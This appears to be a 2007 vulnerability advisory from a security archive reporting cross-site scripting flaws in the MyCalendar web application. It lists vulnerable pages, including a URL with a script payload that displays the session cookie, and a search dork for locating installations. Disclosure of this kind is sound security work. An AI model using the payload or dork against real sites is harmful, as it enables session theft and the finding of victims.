Lucene search

K

SecurityvulnsSECURITYVULNS:DOC:16122

HistoryFeb 20, 2007 - 12:00 a.m.

MyCalendar multiple XSS

2007-02-2000:00:00

vulners.com

58

MyCalendar multiple XSS
By : sn0oPy
Risk : medium
site : http://abledesign.com/programs/MyCalendar/
exploit :

XSS on the search menu : http://www.target.ma/calendar/index.php?go=search
XSS on the url : http://www.target.ma/calendar/index.php?go="><script>alert(document.cookie)</script>
XSS on the username and password at http://www.target.ma/crown/cal/index.php?go=Login
dork : intitle:"myCalendar"
contact : [email protected]
Site : http://forums.avenir-geopolitique.net
greetz : [subzero], Avg Team.
Reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2686